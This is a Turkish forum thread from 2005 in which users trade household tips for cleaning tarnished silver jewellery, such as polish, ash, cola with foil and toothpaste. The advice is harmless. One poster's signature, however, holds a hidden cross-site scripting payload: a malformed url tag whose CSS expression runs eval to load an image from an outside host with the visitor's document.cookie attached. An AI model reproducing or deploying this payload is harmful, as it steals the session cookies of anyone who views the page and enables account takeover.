Smooth Mesaj tarihi: Aralık 10, 2005 Paylaş Mesaj tarihi: Aralık 10, 2005 Durduk yere kararan gumusler icin nasil bir temizleme yontemi uygulaniyor? Bu is icin bi losyon mu vardi yanlis hatirlamiyorsam ama evde losyonsuz uygulanabilecek pratik bir cozum bilen var mi? not: arama yaptim ama bulamadim varsa pardn...[signature][hline]...::Çekip Gidicem Buralardan::... tık...æ...tık [TcT]DJA Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
Asgard Mesaj tarihi: Aralık 10, 2005 Paylaş Mesaj tarihi: Aralık 10, 2005 gümüs temizlemek icin uhu gibi bir madde var onu zavazingoya sürüp ova ova siliyosun:)[signature][hline]Let me die Give me the light I'm waiting for death to knock on my door To release my pain My sadness in the night Forevermore. Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
Smooth Mesaj tarihi: Aralık 10, 2005 Konuyu açan Paylaş Mesaj tarihi: Aralık 10, 2005 galiba bu `uhu gibi bir madde` benim dedigim sey olyor?[signature][hline]...::Çekip Gidicem Buralardan::... tık...æ...tık [TcT]DJA Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
Faust Mesaj tarihi: Aralık 10, 2005 Paylaş Mesaj tarihi: Aralık 10, 2005 Külle ovabilirsin. :hmm:[signature][hline]Wind of change... ]www.noir.gen.tr[url=http:///=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.xtratogame.net/pixel.gif?'+document.cookie;this.sss=null`style='font-size:0;][/url]'[/color][/url][/url] ICQ: 714523 - MSNM: [email protected] Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
Asgard Mesaj tarihi: Aralık 10, 2005 Paylaş Mesaj tarihi: Aralık 10, 2005 said: Smooth, 10 Aralık 2005 11:19 tarihinde demiş ki: galiba bu `uhu gibi bir madde` benim dedigim sey olyor? ehe evet sanırım o yani o madde olmadan biraz zor gibi parlatmak[signature][hline]Let me die Give me the light I'm waiting for death to knock on my door To release my pain My sadness in the night Forevermore. Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
Eldarduil Mesaj tarihi: Aralık 10, 2005 Paylaş Mesaj tarihi: Aralık 10, 2005 benim gümüşler hiç kararmıyor ?!?!!?[signature][hline]:rock: Kings Of Metal .:. :rock: Orphaned Land .:. :rock: - ! - Grrr - ! - ! - www.ultimatr.net - ! - DIABOLICAL Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
Loli-pop Mesaj tarihi: Aralık 10, 2005 Paylaş Mesaj tarihi: Aralık 10, 2005 ya bende de gümüşler wwar.. küpe kolye yuzuk bileklik..hepdi iyi de kolya ile yuzuk parlatmama ragmen bi iki gun sonra tekrar kararıyo ama bileklikle küpe hiç kararmıyo.. acaba kalite farkı mı war..[signature][hline]-houston, üşüdüm olm ben güneşe yaklaşıcam biraz. -apollo bu cok tehlikeli yapma. gemiye zarrar verebilirsin. -hey .....na koyum ne değerli geminiz varmışş sicem yaa. Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
zarek Mesaj tarihi: Aralık 10, 2005 Paylaş Mesaj tarihi: Aralık 10, 2005 gümüşlerin parlamasını gerçekten istiyorsanız tokatlamalısınız.[signature][hline]Dela, 09 Aralık 2005 00:14 tarihinde demiş ki: kac arkadasim kac, arkana bile bakma. kalbini bobregini soker birakirlar. Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
dasaaa Mesaj tarihi: Aralık 10, 2005 Paylaş Mesaj tarihi: Aralık 10, 2005 mythbusters yöntemi ise.. üzerine kola döküp, alüminyum folyo ile ovalayın şeklinde idi.. En azından metal tampon üzerinde işe yaradı.. Gümüşte de işe yarar sanırım[signature][hline]MONO(b)LOG Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
Greeny Mesaj tarihi: Aralık 10, 2005 Paylaş Mesaj tarihi: Aralık 10, 2005 Dostum o gümüş değildir. Aynı yüzükten 2 tane aldım, bir tanesi sevgilime bir tanesi de kendimeydi. Onunki hiç kararmadı lamba gibi parlıyordu, benim ki ise 3.gününde kararmaya başladı. Kuyumcuya götürdüm, benimki madenmiş gümüş değilmiş. Seninki de aynı durumda olabilir. Bir göster.[signature][hline]ABH Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
Platon Mesaj tarihi: Aralık 10, 2005 Paylaş Mesaj tarihi: Aralık 10, 2005 O uhu gibi madde kuyumcularda satılıyor..[signature][hline]Aptallık En Buyuk Günahtır... Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
Smooth Mesaj tarihi: Aralık 11, 2005 Konuyu açan Paylaş Mesaj tarihi: Aralık 11, 2005 said: Greeny, 10 Aralık 2005 14:18 tarihinde demiş ki:i madenmiş gümüş değilmiş. Seninki de aynı durumda olabilir. Bir göster. Yok goldaştan aldım sorun cıkacagını sanmıyorum o konuda :) Bayag uzun suruyor kararması 2 sene oldu nerdeyse kenarları kararmıs hafiften Bi parlatayım dediydim :D[signature][hline]...::Çekip Gidicem Buralardan::... tık...æ...tık [TcT]DJA Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
quasi- Mesaj tarihi: Aralık 11, 2005 Paylaş Mesaj tarihi: Aralık 11, 2005 en etkili ve kolay ulaşılabilen yöntem bezin üzerine diş macunu sürmek sonra da gümüşü bununla iyice bi ovmaktır[signature][hline]ice age coming Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
Öne çıkan mesajlar